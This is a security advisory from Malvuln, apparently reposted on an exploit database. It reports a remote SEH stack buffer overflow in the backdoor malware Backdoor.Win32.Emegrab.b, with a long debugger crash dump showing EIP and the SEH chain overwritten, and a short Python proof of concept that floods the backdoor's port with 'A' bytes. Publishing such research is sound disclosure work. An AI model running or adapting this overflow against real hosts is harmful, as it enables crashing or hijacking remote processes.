Share
## https://sploitus.com/exploit?id=PACKETSTORM:177596
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/19a14d0414aec62ef38378de2e8b259d.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32.Emegrab.b  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Family: Emegrab  
Type: PE32  
MD5: 19a14d0414aec62ef38378de2e8b259d  
Vuln ID: MVID-2024-0675  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 03/13/2024  
Description: The malware listens on TCP port 2323 (typically) however, have seen it use 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347, 4978 then eventually reuses port 2323. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH).  
  
  
Memory Dump:  
(14c0.b6c): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000  
eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
41414141 ?? ???  
  
0:009> .ecxr  
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000  
eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
41414141 ?? ???  
  
0:009> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
*** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e -   
  
FAULTING_IP:   
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b  
0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al  
  
EXCEPTION_RECORD: 260f5de8 -- (.exr 0x260f5de8)  
ExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000001  
Parameter[1]: 26100000  
Attempt to write to address 26100000  
  
PROCESS_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e  
  
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_PARAMETER1: 00000008  
  
EXCEPTION_PARAMETER2: 41414141  
  
WRITE_ADDRESS: 41414141   
  
FOLLOWUP_IP:   
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b  
0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al  
  
FAILED_INSTRUCTION_ADDRESS:   
+fa2b  
41414141 ?? ???  
  
NTGLOBALFLAG: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
IP_ON_HEAP: 41414141  
  
IP_IN_FREE_BLOCK: 41414141  
  
CONTEXT: 260f5e38 -- (.cxr 0x260f5e38)  
eax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74  
eip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b:  
0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al ss:002b:26100000=??  
Resetting default scope  
  
FAULTING_THREAD: ffffffff  
  
BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141  
  
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141  
  
DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141  
  
LAST_CONTROL_TRANSFER: from 41414141 to 0040fa2b  
  
FRAME_ONE_INVALID: 1  
  
STACK_TEXT:   
260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b  
260fff88 41414141 unknown!printable+0x0  
260fff8c 41414141 unknown!printable+0x0  
260fff90 41414141 unknown!printable+0x0  
260fff94 41414141 unknown!printable+0x0  
260fff98 41414141 unknown!printable+0x0  
260fff9c 41414141 unknown!printable+0x0  
260fffa0 41414141 unknown!printable+0x0  
260fffa4 41414141 unknown!printable+0x0  
260fffa8 41414141 unknown!printable+0x0  
260fffac 41414141 unknown!printable+0x0  
260fffb0 41414141 unknown!printable+0x0  
260fffb4 41414141 unknown!printable+0x0  
260fffb8 41414141 unknown!printable+0x0  
260fffbc 41414141 unknown!printable+0x0  
260fffc0 41414141 unknown!printable+0x0  
260fffc4 41414141 unknown!printable+0x0  
260fffc8 41414141 unknown!printable+0x0  
260fffcc 41414141 unknown!printable+0x0  
260fffd0 41414141 unknown!printable+0x0  
260fffd4 41414141 unknown!printable+0x0  
260fffd8 41414141 unknown!printable+0x0  
260fffdc 41414141 unknown!printable+0x0  
260fffe0 41414141 unknown!printable+0x0  
260fffe4 41414141 unknown!printable+0x0  
260fffe8 41414141 unknown!printable+0x0  
260fffec 41414141 unknown!printable+0x0  
260ffff0 41414141 unknown!printable+0x0  
260ffff4 41414141 unknown!printable+0x0  
260ffff8 41414141 unknown!printable+0x0  
260ffffc 41414141 unknown!printable+0x0  
26100000 41414141 unknown!printable+0x0  
  
STACK_COMMAND: .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb  
  
SYMBOL_STACK_INDEX: 0  
  
SYMBOL_NAME: backdoor_win32_emegrab_b+fa2b  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d  
  
IMAGE_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 4a822c0e  
  
FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown  
  
BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b  
0:009> !exchain  
260013fc: ntdll!ExecuteHandler2+44 (775e9d70)  
260fffcc: 41414141  
Invalid exception stack at 41414141  
  
  
Exploit/PoC:  
from socket import *  
  
MALWARE_HOST="x.x.x.x"  
PORT=2323  
s=socket(AF_INET, SOCK_STREAM)  
s.connect((MALWARE_HOST, PORT))  
  
PAYLOAD="A"*666  
s.send(PAYLOAD.encode())  
s.close()  
  
print("Backdoor.Win32.Emegrab BOF Exploit by Malvuln")  
  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).